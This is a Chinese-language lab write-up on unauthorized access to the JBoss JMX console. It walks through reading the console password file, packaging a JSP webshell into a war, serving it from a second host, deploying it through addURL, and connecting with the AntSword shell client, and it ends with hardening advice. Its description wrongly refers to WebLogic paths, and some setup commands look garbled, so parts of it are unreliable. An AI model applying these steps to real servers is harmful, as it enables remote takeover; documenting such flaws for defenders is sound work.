JBoss-JMX-Console-Unauthorized
forg12

描述

​ WebLogic管理端未授权的两个页面存在任意上传getshell漏洞,可直接获取权限。两个页面分别为/ws_utc/begin.do,/ws_utc/config.do。

影响版本

全版本

环境搭建

这里使用docker拉取testjboss来复现该漏洞。

1
2
3
4
docker search testjboss
docker pull testjboss/jboss
docker run -p 8080:8080 -d
docker-compose up -d testjboss/jboss

image-20221024143958356

image-20221024144109523

image-20221024144338214

查看环境

1
http://192.168.3.50:8080/

image-20221024155031151

因为这里使用的是vulhub的环境,所以需要去环境里面查看后台的密码。

1
2
3
[root@localhost ~]#docker ps
[root@localhost ~]#docker exec -it 374772b7c889 /bin/bash
root@374772b7c889:/# cat jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties

image-20221021134208777

复现过程

进入页面,点击JMX console

image-20221024155139948

找到jboss.deployment

image-20221024144502521

找到addURL,在服务器上放好war包,提供给远程下载。

1
2
3
jar cvf shell.war shell.jsp
python3 -m http.server 1111
192.168.3.61:1111/shell.war

image-20221024142800193

image-20221024142843122

image-20221024144603859

image-20221024144704919

image-20221024144656044

点击Web application ,然后点击右上角的add

蚁剑连接

image-20221024154518654

image-20221024154539325

修复建议

1、将JBoss后台添加权限,控制访问者对敏感路径访问

2、若不使用控制平台管理,建议关闭jmx-console和web-console,提高安全性。删除jmx-console.war和web-console.war,在以下路径。

1
2
jboss\server\all\deploy\jmx-console.war
jboss\server\default\deploy\jmx-console.war